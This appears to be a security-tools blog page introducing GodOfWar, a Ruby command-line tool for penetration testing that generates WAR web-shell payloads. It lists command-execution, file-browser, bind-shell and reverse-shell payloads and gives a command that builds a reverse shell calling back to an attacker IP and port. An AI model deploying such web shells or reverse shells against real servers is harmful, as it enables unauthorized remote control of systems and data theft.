GodOfWar is a command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.
Features
Also Read – MySQL Magic: Dump MySQL Client Password From Memory
Installation
$ gem install godofwar
Usage
$ godofwar -h
Help menu:
-p, –payload PAYLOAD Generates war from one of the available payloads. (check -l/–list)
-H, –host IP_ADDR Local or Remote IP address for the chosen payload (used with -p/–payload)
-P, –port PORT Local or Remote Port for the chosen payload (used with -p/–payload)
-o, –output [FILE] Output file and the deployment name.
(default is the payload original name. check ‘-l/–list’)
-l, –list list all available payloads.
-h, –help Show this help message.
Example
List all payloads
$ godofwar -l
├── cmd_get
│ └── Information:
│ ├── Description: Command execution via web interface
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/cmd.jsp?cmd=whoami
│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Information:
│ ├── Description: Remote file browser, upload, download, unzip files and native command execution
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/filebrowser.jsp
│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Information:
│ ├── Description: TCP bind shell
│ ├── OS: any
│ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse-shell.jsp
│ ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Information:
│ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell_ui.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Information:
│ ├── Description: TCP reverse shell. LHOST and LPORT are hardcoded
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Generate payload with LHOST and LPORT
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
The cp command, short for "copy," is the main Linux utility for duplicating files and directories. Whether…
Introduction In digital investigations, images often hold more information than meets the eye. With the…
The cat command short for concatenate, It is a fast and versatile tool for viewing and merging…
What is a Port? A port in networking acts like a gateway that directs data…
The ls command is fundamental for anyone working with Linux. It’s used to display the files and…
The pwd (Print Working Directory) command is essential for navigating the Linux filesystem. It instantly shows your…